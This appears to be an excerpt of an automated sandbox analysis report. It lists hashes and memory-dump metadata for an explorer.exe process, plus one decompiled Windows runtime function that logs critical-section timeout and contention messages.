                                  • Opcode ID: a714ccd9be1f095c3c74df8391fc4f48c6866eedcca8de211dbdf4dcb0402e58
                                  • Instruction ID: 5777b893425ea41172c1bf37eeebdfe89a9d5ad5cb44a1c1cfbfb18d07d7a302
                                  • Opcode Fuzzy Hash: a714ccd9be1f095c3c74df8391fc4f48c6866eedcca8de211dbdf4dcb0402e58
                                  • Instruction Fuzzy Hash: E5D0A77165030437F610E7E48C83F2672CC9B48A50F094064F909DB3C3E950F1004164
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 349ef1b53e92812b1ed72b38f2411b15fc3f557ff57fbbe74b865e106e20a01f
                                  • Instruction ID: c35c5613037bc05f5e44324919e1355c7962ac647aa0da11267ca60c389bb24b
                                  • Opcode Fuzzy Hash: 349ef1b53e92812b1ed72b38f2411b15fc3f557ff57fbbe74b865e106e20a01f
                                  • Instruction Fuzzy Hash: 92B09B719414C5C5D615D7604608B27796177D1745F57C052D2020641A4778C0D1F6B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E0563FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                  				void* _t7;
                                  				intOrPtr _t9;
                                  				intOrPtr _t10;
                                  				intOrPtr* _t12;
                                  				intOrPtr* _t13;
                                  				intOrPtr _t14;
                                  				intOrPtr* _t15;
                                  
                                  				_t13 = __edx;
                                  				_push(_a4);
                                  				_t14 =  *[fs:0x18];
                                  				_t15 = _t12;
                                  				_t7 = E055ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                  				_push(_t13);
                                  				E05635720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                  				_t9 =  *_t15;
                                  				if(_t9 == 0xffffffff) {
                                  					_t10 = 0;
                                  				} else {
                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                  				}
                                  				_push(_t10);
                                  				_push(_t15);
                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                  				return E05635720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                  			}










                                  0x0563fdda
                                  0x0563fde2
                                  0x0563fde5
                                  0x0563fdec
                                  0x0563fdfa
                                  0x0563fdff
                                  0x0563fe0a
                                  0x0563fe0f
                                  0x0563fe17
                                  0x0563fe1e
                                  0x0563fe19
                                  0x0563fe19
                                  0x0563fe19
                                  0x0563fe20
                                  0x0563fe21
                                  0x0563fe22
                                  0x0563fe25
                                  0x0563fe40

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0563FDFA
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0563FE01
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0563FE2B
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.708302056.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                  • Associated: 0000000C.00000002.708969903.000000000569B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 0000000C.00000002.708983931.000000000569F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_5580000_explorer.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: 434d08d4027162844a01888df13aa5b967be3b7a61df3d0be1a40629cb25b8ef
                                  • Instruction ID: eecbe2b15e098b6bdf128a279734a6ffdee10ba5774ecbf1999b1e335ffc448f
                                  • Opcode Fuzzy Hash: 434d08d4027162844a01888df13aa5b967be3b7a61df3d0be1a40629cb25b8ef
                                  • Instruction Fuzzy Hash: 83F0F036640201BFEB241A45DC07F23BF6BEB84730F240318F628565E1EA62F820D6F4
                                  Uniqueness

                                  Uniqueness Score: -1.00%